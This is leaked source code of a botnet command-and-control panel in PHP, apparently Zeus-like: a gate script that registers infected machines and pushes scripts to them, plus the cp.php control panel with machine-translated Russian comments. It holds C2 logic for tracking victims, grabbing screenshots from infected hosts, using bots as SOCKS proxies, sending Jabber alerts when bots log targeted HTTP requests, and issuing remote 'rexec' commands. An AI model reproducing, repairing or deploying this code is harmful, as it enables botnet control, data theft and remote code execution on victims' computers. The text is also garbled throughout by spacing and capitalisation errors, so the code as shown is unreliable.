"Port_s1 =". (Empty ($ list [SBCID_PORT_S1])? 0: ToUshort ($ list [SBCID_PORT_S1 ])).",".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",". "Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".

"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".

"Ipv4 = '". addslashes ($ real_ipv4 )."',". "Flag_nat = IF (net_latency> 0, IF (port_s1> 0, 0, 1), 1 )";// FIXME: NAT Detect bots.

if (! mysql_query ("INSERT INTO botnet_list SET comments ='', rtime_first = {$ curtime}, rtime_online = {$ curtime}, flag_install =". (ToInt ($ list [SBCID_BOT_STATUS]) == BS_INSTALLED? 1: 0) . ", {$ query}".

"ON DUPLICATE KEY UPDATE rtime_online = IF (rtime_last <= {$ rtime_min_online}, {$ curtime}, rtime_online), {$ query}")) die ();

/ / Find the script to send. $ Reply_data ='';

$ Reply_count = 0;

$ Bot_id_qm = ToSQLSafeMask ($ bot_id_q);

$ Botnet_qm = ToSQLSafeMask ($ botnet_q);

$ Country_qm = ToSQLSafeMask ($ country_q);

$ R = @ mysql_query ("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled = 1 AND".

"(Countries_wl =''OR countries_wl LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND". "(Countries_bl NOT LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND".

"(Botnets_wl =''OR botnets_wl LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND".

"(Botnets_bl NOT LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND". "(Bots_wl =''OR bots_wl LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%') AND".

"(Bots_bl NOT LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%')".

"LIMIT 10");

if ($ r) while ((($ m = mysql_fetch_row ($ r)))) {

$ Eid = addslashes ($ m [0]);

/ / Check whether the limit is reached.

if ($ m [2], = 0 & & ($ j = @ mysql_query ("SELECT COUNT (*) FROM botnet_scripts_stat WHERE type = 1 AND extern_id =

'{$ eid }'")) & & ($ c = mysql_fetch_row ($ j)) & & $ c [0]> = $ m [2]) {

@ Mysql_query ("UPDATE botnet_scripts SET flag_enabled = 0 WHERE id = {$ m [3]} LIMIT 1");

continue; }

/ / Dobovlyaem bot in the list sent. if (@ mysql_query ("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id = '{$ eid}', type = 1, bot_id = '{$

bot_id_q}', bot_version = {$ bot_version}, rtime = {$ curtime}, report = ' Sended '"))

{ $ Size = strlen ($ m [1]) + strlen ($ m [0]);

$ Reply_data .= pack ('LLLL', + + $ reply_count, 0, $ size, $ size). $ M [0]. $ M [1];

}

}

if ($ reply_count> 0) {

$ Reply_data = pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, $ reply_count). Md5 ($ reply_data, true). $ Reply_data;

echo RC4 ($ reply_data, BOTNET_CRYPTKEY); die ();

}

} else die ();

/ / Send an empty response. SendEmptyReply ();

////////////////////////////////////////////////// ///////////////////////////// / / Functions.

////////////////////////////////////////////////// /////////////////////////////

/ *

Send a blank response and output.

* / function SendEmptyReply ()

{

echo RC4 (pack ('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1). "\ x4A \ xE7 \ x13 \ x36 \ xE4 \ x4B \ xF9 \ xBF \ x79 \ xD2 \ x75 \ x2E \ x23 \ x48 \ x18 \ xA5 "." \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 ", BOTNET_CRYPTKEY);

die ();

}

/ *

Getting the country.

Return - string, country. * /

function GetCountryIPv4 ()

{ global $ real_ipv4;

$ Ip = sprintf ('% u', ip2long ($ real_ipv4));

if (($ r = @ mysql_query ("SELECT c FROM ipv4toc WHERE l <='".$ ip." 'AND h >='".$ ip. "' LIMIT 1")) & & ($ m =

mysql_fetch_row ( $ r))! == false) return $ m [0];

else return'--';

}

/ *

Kovertatsiya Bin2UINT.

IN $ str - string, the original binary string.

Return - int, the converted number.

* /

function ToUint ($ str)

{

$ Q = @ unpack ('L', $ str); return is_array ($ q) & & is_numeric ($ q [1])? ($ Q [1] <0? Sprintf ('% u', $ q [1]): $ q [1]): 0;

}

/ *

Kovertatsiya Bin2INT.


Return - int, the converted number. * /

function ToInt ($ str)

{ $ Q = @ unpack ('l', $ str);

return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0;

}

/ *

Kovertatsiya Bin2SHORT.


Return - int, the converted number.

* /

function ToUshort ($ str) {

$ Q = @ unpack ('S', $ str);

return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0; }

/ * Checks whether a name uvyazimym as part of the road.

IN $ name - name to check. Return - true - if the name uvyazmo,

false - if not uvyazimo.

* / function IsHackNameForPath ($ name)

{

return (strlen ($ name)> 0 & & strcmp ($ name,'..')! == 0 & & strcmp ($ name, '.')! == 0 & & strpos ($ name, '/') === false & & strpos ($ name, '\ \') === false & & strpos ($ name, "\ x00") === false

)? false: true;

}

function IMNotify (& $ type, & $ list, & $ bot_id)

{ if (($ type == BLT_HTTP_REQUEST | | $ type == BLT_HTTPS_REQUEST) & &! empty ($ list [SBCID_PATH_SOURCE]))

{

$ Ml = split ("\ x01", REPORTS_JN_LIST); foreach ($ ml as & $ mask)

{ if (@ preg_match ('#^'. str_replace ('\ \ *','.*', preg_quote ($ mask,'#')).'$# i ', $ list [SBCID_PATH_SOURCE])> 0)

{

$ Message = htmlentities ("Bot ID:". $ Bot_id. "\ NURL:". $ List [SBCID_PATH_SOURCE]. "\ N \ n". Substr ($ list [SBCID_BOTLOG], 0, 1024));

error_reporting (0);

if (strlen (REPORTS_JN_LOGFILE)> 0 & & ($ fh = @ fopen (REPORTS_JN_LOGFILE, 'at'))! == false)

{ @ Fwrite ($ fh, $ message. "\ N \ n". Str_repeat ('=', 1940). "\ N \ n");

@ Fclose ($ fh);

}

require_once ("system / jabberclass.php");

$ Jab = new Jabber;

$ Jab-> server = REPORTS_JN_SERVER;

$ Jab-> port = REPORTS_JN_PORT;

$ Jab-> username = REPORTS_JN_ACCOUNT;

$ Jab-> password = REPORTS_JN_PASS;

if ($ jab-> Connect ())

{ $ Jab-> SendAuth ();

$ Jab-> SendPresence (NULL, NULL, "online");

$ Jab-> SendMessage (REPORTS_JN_TO, "normal", NULL, array ("body" => $ message)); $ Jab-> Disconnect ();

}

if (strlen (REPORTS_JN_SCRIPT)> 0)

{

$ Eid = md5 ($ mask, true); $ Script = 'rexec "'. Trim (REPORTS_JN_SCRIPT). '"-F';

$ Size = strlen ($ eid) + strlen ($ script);

$ Reply_data = pack ('LLLL', 1, 0, $ size, $ size). $ Eid. $ Script; echo RC4 (pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, 1). md5 ($ reply_data, true). $ reply_data,

BOTNET_CRYPTKEY);

die ();

}

break;

} }

}

} ?>

cp.php (Russian comments were translated with google translator online):

<? Php define ('__CP__', 1);

require_once ('system / global.php');

if (! @ include_once ('system / config.php')) die ('Hello! How are you?');

////////////////////////////////////////////////// /////////////////////////////

/ / Constants. ////////////////////////////////////////////////// /////////////////////////////

define ('CURRENT_TIME', time ()); / / Current time. define ('ONLINE_TIME_MIN', (CURRENT_TIME - BOTNET_TIMEOUT)); / / Minimum time for the status of "Online."

define ('DEFAULT_LANGUAGE', 'en'); / / default language.

define ('THEME_PATH', 'theme'); / / folder for the theme.

/ / HTTP requests.

define ('QUERY_SCRIPT', basename ($ _SERVER ['PHP_SELF'])); define ('QUERY_SCRIPT_HTML', QUERY_SCRIPT);

define ('QUERY_VAR_MODULE', 'm'); / / variable points to the current module. define ('QUERY_STRING_BLANK', QUERY_SCRIPT. '? m ='); / / Empty query string.

define ('QUERY_STRING_BLANK_HTML', QUERY_SCRIPT_HTML. '? m ='); / / Empty query string in HTML.

define ('CP_HTTP_ROOT', str_replace ('\ \', '/', (! empty ($ _SERVER ['SCRIPT_NAME'])? dirname ($ _SERVER ['SCRIPT_NAME']):'/'))); / / The root of the CP.

/ / A session cookie. define ('COOKIE_USER', 'p'); / / username in cookies.

define ('COOKIE_PASS', 'u'); / / user password in the cookie.

define ('COOKIE_LIVETIME', CURRENT_TIME + 2592000) / / Lifetime of cookies. define ('COOKIE_SESSION', 'ref'); / / variable to store the session.

define ('SESSION_LIVETIME', CURRENT_TIME + 1300) / / Lifetime of the session.

////////////////////////////////////////////////// /////////////////////////////

/ / Initialize.

////////////////////////////////////////////////// /////////////////////////////

/ / Connect to the database.

if (! ConnectToDB ()) die (mysql_error_ex ());

/ / Connect the topic.

require_once (THEME_PATH. '/ index.php');

/ Management / login.

if (! empty ($ _GET [QUERY_VAR_MODULE]))

{ / / Login form.

if (strcmp ($ _GET [QUERY_VAR_MODULE], 'login') === 0)

{ UnlockSessionAndDestroyAllCokies ();

if (isset ($ _POST ['user']) & & isset ($ _POST ['pass'])) {

$ User = $ _POST ['user'];

$ Pass = md5 ($ _POST ['pass']);

/ / Check the login.

if (@ mysql_query ("SELECT id FROM cp_users WHERE name = '". addslashes ($ user). "' AND pass = '". addslashes ($ pass). "'

AND flag_enabled = '1 'LIMIT 1") & & @ mysql_affected_rows () == 1)

{

if (isset ($ _POST ['remember']) & & $ _POST ['remember'] == 1) {

setcookie (COOKIE_USER, md5 ($ user), COOKIE_LIVETIME, CP_HTTP_ROOT);

setcookie (COOKIE_PASS, $ pass, COOKIE_LIVETIME, CP_HTTP_ROOT); }

LockSession (); $ _SESSION ['Name'] = $ user;

$ _SESSION ['Pass'] = $ pass;

/ / UnlockSession ();

header ('Location:'. QUERY_STRING_BLANK. 'home');

} else ShowLoginForm (true);

die ();

}

ShowLoginForm (false);

die (); }

/ / Exit if (strcmp ($ _GET ['m'], 'logout') === 0)

{

UnlockSessionAndDestroyAllCokies (); header ('Location:'. QUERY_STRING_BLANK. 'login');

die ();

} }

////////////////////////////////////////////////// /////////////////////////////

/ / Check the login data.

////////////////////////////////////////////////// /////////////////////////////

$ Logined = 0, / / flag means zalogininy we.

/ / Login through the session.

LockSession ();

if (! empty ($ _SESSION ['name']) & &! empty ($ _SESSION ['pass'])) {

if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE name = '". addslashes ($ _SESSION [' name'])."' AND pass = '".

addslashes ($ _SESSION [' pass']). "'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @ mysql_affected_rows (); }

/ / Login through cookies.

if ($ logined! == 1 & &! empty ($ _COOKIE [COOKIE_USER]) & &! empty ($ _COOKIE [COOKIE_PASS])) {

if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE MD5 (name )='". addslashes ($ _COOKIE [COOKIE_USER ])."'

AND pass = '". addslashes ($ _COOKIE [COOKIE_PASS]). " 'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @

mysql_affected_rows ();

} / / Unable to login.

if ($ logined! == 1)

{ UnlockSessionAndDestroyAllCokies ();

header ('Location:'. QUERY_STRING_BLANK. 'login');

die (); }

/ / Get the user data. $ _USER_DATA = @ Mysql_fetch_assoc ($ r);

if ($ _USER_DATA === false) die (mysql_error_ex ());

$ _SESSION ['Name'] = $ _USER_DATA ['name']; $ _SESSION ['Pass'] = $ _USER_DATA ['pass'];

/ / Connect the tongue. if (@ strlen ($ _USER_DATA ['language'])! = 2 | |! SafePath ($ _USER_DATA ['language']) | |! file_exists ('system / lng .'.$_

USER_DATA [' language '].' . php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;

require_once ('system / lng .'.$_ USER_DATA [' language'].'. php ');

UnlockSession ();

////////////////////////////////////////////////// /////////////////////////////

/ / Define the menu.

////////////////////////////////////////////////// /////////////////////////////

/ / Main Menu.

$ _MAINMENU = Array (/ / module. / / Title. / / Required Rights. array (0, LNG_MM_STATS, array ()),

array ('stats_main', LNG_MM_STATS_MAIN, array ('r_stats_main')),

array ('stats_os', LNG_MM_STATS_OS, array ('r_stats_os')),

array (0, LNG_MM_BOTNET, array ()),

array ('botnet_bots', LNG_MM_BOTNET_BOTS, array ('r_botnet_bots')), array ('botnet_scripts', LNG_MM_BOTNET_SCRIPTS, array ('r_botnet_scripts')),

array (0, LNG_MM_REPORTS, array ()), array ('reports_db', LNG_MM_REPORTS_DB, array ('r_reports_db')),

array ('reports_files', LNG_MM_REPORTS_FILES, array ('r_reports_files')),

array ('reports_jn', LNG_MM_REPORTS_JN, array ('r_reports_jn')),

array (0, LNG_MM_SYSTEM, array ()),

array ('sys_info', LNG_MM_SYSTEM_INFO, array ('r_system_info')), array ('sys_options', LNG_MM_SYSTEM_OPTIONS, array ('r_system_options')),

array ('sys_user', LNG_MM_SYSTEM_USER, array ('r_system_user')),

array ('sys_users', LNG_MM_SYSTEM_USERS, array ('r_system_users')) );

/ / Menu Deytvie over bot. Also used for an array of bots. $ _BOT_MENU = Array (

array ('fullinfo', LNG_MBA_FULLINFO, array ('r_botnet_bots')), array ('fullinfoss', LNG_MBA_FULLINFOSS, array ('r_botnet_bots')),

array (0, LNG_MBA_SEPARATOR, array ()), array ('today_dbreports', LNG_MBA_TODAY_DBREPORTS, array ('r_reports_db')),

array ('week_dbreports', LNG_MBA_WEEK_DBREPORTS, array ('r_reports_db')),

array ('files', LNG_MBA_FILES, array ('r_reports_files')),

array (0, LNG_MBA_SEPARATOR, array ()),

array ('remove', LNG_MBA_REMOVE, array ('r_edit_bots')), array ('removeex', LNG_MBA_REMOVE_REPORTS, array ('r_edit_bots', 'r_reports_db_edit', 'r_reports_files_edit')),

array (0, LNG_MBA_SEPARATOR, array ()), array ('port_socks', LNG_MBA_PORT_SOCKS, array ('r_botnet_bots')),

array ('newscript', LNG_MBA_NEWSCRIPT, array ('r_botnet_scripts_edit'))

);

OptimizeMenu ($ _BOT_MENU, false);

////////////////////////////////////////////////// /////////////////////////////

/ / Handle the group of bots. ////////////////////////////////////////////////// /////////////////////////////

if ((! empty ($ _GET ['botsaction']) | |! empty ($ _POST ['botsaction'])) & & ((! empty ($ _POST ['bots']) & & is_array ($ _POST [' bots '])) | | (! empty ($ _GET [' bots ']) & & is_array ($ _GET [' bots']))))

{

$ Bedit = empty ($ _USER_DATA ['r_edit_bots'])? 0: 1; $ Ba =! Empty ($ _GET ['botsaction'])? $ _GET ['Botsaction']: $ _POST ['botsaction'];

$ Blist =! Empty ($ _POST ['bots']) & & is_array ($ _POST ['bots'])? $ _POST ['Bots']: $ _GET ['bots'];

$ Blist = array_unique ($ blist);

/ / Check whether the right of action.

$ Deny = true; foreach ($ _BOT_MENU as $ item) if ($ item [0]! == 0 & & strcmp ($ item [0], $ ba) === 0) {$ deny = false; break;}

if ($ deny) ThemeFatalError (LNG_ACCESS_DEFINED);

/ / Is a list of bots to MySQL.

$ Sql_blist ='';

$ Count = 0;

foreach ($ blist as $ bot) $ sql_blist .= ($ count + + == 0?'': 'OR'). "bot_id = '". addslashes ($ bot )."'";

if (strcmp ($ ba, 'fullinfo') === 0 | | strcmp ($ ba, 'fullinfoss') === 0) {

/ / Mode updatings.

if ($ bedit & & isset ($ _GET ['save']) & & (isset ($ _POST ['used']) & & is_array ($ _POST ['used'])) & & (isset ($ _POST ['comments'] ) & & is_array ($ _POST ['comments'])))

{

$ Q =''; foreach ($ blist as $ i => $ bot) if (isset ($ _POST ['used'] [$ i]) & & isset ($ _POST ['comments'] [$ i]))

{

@ Mysql_query ("UPDATE botnet_list SET flag_used ='".($_ POST ['used'] [$ i] == 1? 1: 0 )."', comments = '". Addslashes (substr ($ _POST [' comments '] [$ i], 0, 250 ))."' WHERE bot_id =' ". addslashes ($ bot)." 'LIMIT 1 ");

$ Q .= '& bots []='. urlencode ($ bot);

}

header ('Location:'. QUERY_SCRIPT. '? botsaction ='. urlencode ($ ba). $ q);

die (); }

/ / Screenshot. if (strcmp ($ ba, 'fullinfoss') === 0 & & isset ($ _GET ['ipv4']) & & isset ($ _GET ['port']))

{

$ Format = 'image /'.$_ USER_DATA [' ss_format ']; $ Data = 0;

if (($ sock = @ fsockopen ($ _GET ['ipv4'], $ _GET ['port'], $ errn, $ errs, 5))) {

@ Stream_set_timeout ($ sock, 5);

@ Fwrite ($ sock, pack ('LLL', 10, strlen ($ format) + 4, $ _USER_DATA ['ss_quality']).$ format); @ Fflush ($ sock);

if (($ fs = @ fread ($ sock, 8)) & & ($ fs = @ unpack ('L2', $ fs)))

{

while ($ data <$ fs [1] & &! @ feof ($ sock)) {

$ Need = min ($ fs [2], $ fs [1] - $ data);

if (! ($ td = @ fread ($ sock, $ need))) break;

$ Sm = strlen ($ td);

while ($ sm <$ need & &! @ feof ($ sock) & & ($ td2 = @ fread ($ sock, $ need-$ sm ))){$ sm + = strlen ($ td2); $ td .= $

td2;} if ($ data == 0) header ('Content-Type:'. $ format);

$ Data + = $ sm;

echo $ td; if (! @ fwrite ($ sock, pack ('L', $ fs [2]))) break;

@ Fflush ($ sock);

} }

@ Fclose ($ sock);

}

if ($ data === 0) {

header ('Content-Type: image / png');

echo file_get_contents (THEME_PATH. '/ failed.png'); }

die ();

}

/ / Stdout.

if (! ($ r = @ mysql_query ('SELECT *, IF (rtime_last> = \''. ONLINE_TIME_MIN.' \ ', 1, 0) AS is_online FROM botnet_list WHERE'. $ sql_blist))) ThemeMySQLError ();

/ / Get the result. $ Res = array ();

while (($ m = @ mysql_fetch_assoc ($ r))) $ res [$ m ['bot_id']] = $ m;

mysql_free_result ($ r); unset ($ m);

/ / Display the result.

$ E_count = 0;

$ Data ='';

if ($ bedit) $ data .= str_replace (array ('{NAME}', '{URL}', '{JS_EVENTS}'), array ('edit', QUERY_SCRIPT_HTML. '? botsaction ='. $ ba. ' & save = 1 ',''), THEME_FORMPOST_BEGIN);

$ Data .=

str_replace ('{WIDTH}', '90% ', THEME_DIALOG_BEGIN). str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (1, LNG_BA_FULLINFO_TITLE), THEME_DIALOG_TITLE).

THEME_DIALOG_ROW_BEGIN.

str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_ITEM_CHILD_BEGIN);

foreach ($ blist as $ bot)

{ $ Data .=

str_replace ('{WIDTH}', '100% ', THEME_LIST_BEGIN).

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTID), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', BotPopupMenu ($ bot, 'botmenu')),

THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;

/ / Background. $ Is_exists = isset ($ res [$ bot]);

if (! $ is_exists) $ data .= THEME_LIST_ROW_BEGIN.str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2,

LNG_BA_FULLINFO_EMPTY), THEME_LIST_ITEM_EMPTY_1). THEME_LIST_ROW_END; else

{

$ E_count + +; $ L = $ res [$ bot];

$ Data .=

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTNET),

THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['botnet'])), THEME_LIST_ITEM_LTEXT_U2).

THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_VERSION),

THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', IntToVersion ($ l ['bot_version'])),


THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OS), THEME_LIST_ITEM_LTEXT_U2).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', OSDataToString ($ l ['os_version'])),

THEME_LIST_ITEM_LTEXT_U2). THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN.

str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OSLANG), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['language_id'])),


THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TIMEBIAS),


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', TimeBiasToText ($ l ['time_localbias'])), THEME_LIST_ITEM_LTEXT_U2).

THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_COUNTRY),


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['country'])), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END.


str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_IPV4), THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['ipv4']).($ l [' flag_nat ']?' * ':'') ),


THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.

str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_LATENCY),


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', number_format_as_float ($ l ['net_latency'] / 1000, 3)),



str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_PORT_S1),

THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['port_s1'])), THEME_LIST_ITEM_LTEXT_U2).

THEME_LIST_ROW_END.

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TFIRST), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex (gmdate (LNG_FORMAT_DT, $ l ['rtime_first']))),

THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END.


str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TLAST), THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex (gmdate (LNG_FORMAT_DT, $ l ['rtime_last']))),



str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TONLINE),

THEME_LIST_ITEM_LTEXT_U1). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['is_online'] == 1? TickCountToTime (CURRENT_TIME - $ l

['rtime_online']): LNG_FORMAT_NOTIME), THEME_LIST_ITEM_LTEXT_U1).


str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_INSTALL),

THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['flag_install'] == 1? LNG_YES: LNG_NO),



str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_USED), THEME_LIST_ITEM_LTEXT_U1). ($ Bedit

?

str_replace (array ('{NAME}', '{WIDTH}'), array ('used []', 'auto'), THEME_LIST_ITEM_LISTBOX_U1_BEGIN). str_replace (array ('{VALUE}', '{TEXT}'), array (0, LNG_NO), $ l ['flag_used']! = 1?

THEME_LIST_ITEM_LISTBOX_ITEM_CUR: THEME_LIST_ITEM_LISTBOX_ITEM).

str_replace (array ('{VALUE}', '{TEXT}'), array (1, LNG_YES), $ l ['flag_used'] == 1?

THEME_LIST_ITEM_LISTBOX_ITEM_CUR: THEME_LIST_ITEM_LISTBOX_ITEM).

(THEME_LIST_ITEM_LISTBOX_U1_END)

: str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['flag_used'] == 1? LNG_YES: LNG_NO),

THEME_LIST_ITEM_LTEXT_U1)

). THEME_LIST_ROW_END.


str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_COMMENTS), THEME_LIST_ITEM_LTEXT_U2).

($ Bedit

?

str_replace (array ('{NAME}', '{VALUE}', '{MAX}', '{WIDTH}'), array ('comments []', htmlentities_ex ($ l ['comments']),

250, '99% '), THEME_LIST_ITEM_INPUT_TEXT_U2) :

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', empty ($ l ['comments'])?' - ': htmlentities_ex ($ l [' comments'])),

THEME_LIST_ITEM_LTEXT_U2) ).

THEME_LIST_ROW_END;

if (strcmp ($ ba, 'fullinfoss') === 0)

{

$ Ss = str_replace ('{URL}', htmlentities_ex (QUERY_SCRIPT. '? botsaction = fullinfoss & bots [] = 0 & ipv4 ='. urlencode ($ l ['ipv4']).'& port

='. urlencode ($ l ['port_s1'])),

THEME_SCREENSHOT);

$ Data .=

THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_SCREENSHOT),


str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ ss), THEME_LIST_ITEM_LTEXT_U1).

THEME_LIST_ROW_END;

}

}

/ / Ending.

$ Data .= THEME_LIST_END.

($ Bedit & & $ is_exists? Str_replace (array ('{NAME}', '{VALUE}'), array ('bots []', htmlentities_ex ($ bot)),

THEME_FORM_VALUE):''). THEME_VSPACE;

}

$ Data .=

THEME_DIALOG_ITEM_CHILD_END.

THEME_DIALOG_ROW_END;

if ($ bedit & & $ e_count> 0)

{ $ Data .=

str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_ACTIONLIST_BEGIN).

str_replace (array ('{TEXT}', '{JS_EVENTS}'), array (LNG_BA_FULLINFO_ACTION_SAVE,''), THEME_DIALOG_ITEM_ACTION_SUBMIT).

THEME_DIALOG_ACTIONLIST_END;

}

$ Data .=

THEME_DIALOG_END. ($ Bedit? THEME_FORMPOST_END:'');

ThemeSmall (LNG_BA_FULLINFO_TITLE, $ data, 0, GetBotJSMenu ('botmenu'), 0); }

else if (strcmp ($ ba, 'today_dbreports') === 0 | | strcmp ($ ba, 'week_dbreports') === 0) {

$ Date2 = gmdate ('ymd', CURRENT_TIME);

$ Date1 = strcmp ($ ba, 'week_dbreports') === 0? gmdate ('ymd', CURRENT_TIME - 518400): $ date2;

foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"';

header ('Location:'. QUERY_STRING_BLANK. 'reports_db & date1 ='. urlencode ($ date1). '& date2 ='. urlencode ($ date2). '&

bots ='. urlencode (implode ('', $ blist )).'& q = ');

die ();

} else if (strcmp ($ ba, 'files') === 0)

{

foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"'; header ('Location:'. QUERY_STRING_BLANK. 'reports_files & bots ='. urlencode (implode ('', $ blist )).'& q = ');

die ();

} else if (strcmp ($ ba, 'remove') === 0 | | strcmp ($ ba, 'removeex') === 0) / / Check if the rights are not required, because checking

prishodit in the formation of $ _BOT_MENU.

{

if (isset ($ _GET ['yes']) | | isset ($ _GET ['no']))

{ $ Data =

str_replace ('{WIDTH}', 'auto', THEME_LIST_BEGIN).

str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2, LNG_BA_REMOVE_TITLE), THEME_LIST_TITLE);

if (isset ($ _GET ['yes']))

{ / / Remove from botnet_list.

if (@ mysql_query ('DELETE FROM botnet_list WHERE'. $ sql_blist)) $ t = str_replace ('{TEXT}', sprintf

(LNG_BA_REMOVE_REMOVED, @ mysql_affected_rows ()), THEME_STRING_SUCCESS); else $ t = str_replace ('{TEXT}', mysql_error_ex (), THEME_STRING_ERROR);

$ Data .= THEME_LIST_ROW_BEGIN.

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', 'botnet_list'), THEME_LIST_ITEM_LTEXT_U1).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;

/ / Remove.

if (strcmp ($ ba, 'removeex') === 0)

{

$ I = 1; $ Rlist = ListReportTables (MYSQL_DB);

/ / Remove from botnet_reports_ *. foreach ($ rlist as $ table)

{

if (@ mysql_query ("DELETE FROM {$ table} WHERE". $ sql_blist)) $ t = str_replace ('{TEXT}', sprintf (LNG_BA_REMOVE_REMOVED, @ mysql_affected_rows ()), THEME_STRING_SUCCESS);

else $ t = str_replace ('{TEXT}', mysql_error_ex (), THEME_STRING_ERROR);

$ Item = ($ i% 2? THEME_LIST_ITEM_LTEXT_U2: THEME_LIST_ITEM_LTEXT_U1);

$ Data .= THEME_LIST_ROW_BEGIN.

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ table)), $ item).

str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), $ item). THEME_LIST_ROW_END;

$ I + +; }

/ / Delete files. $ Root = getdirs (REPORTS_PATH);

if ($ root! == false) foreach ($ root as $ rdir)

{ $ Rdir = REPORTS_PATH .'/'.$ rdir;

$ Botnets = getdirs ($ rdir);

if ($ botnets! == false) foreach ($ botnets as $ botnet)

{ $ Botnet = $ rdir .'/'.$ botnet;

$ Bots = getdirs ($ botnet);

if ($ bots! == false) foreach ($ bots as $ bot)

{

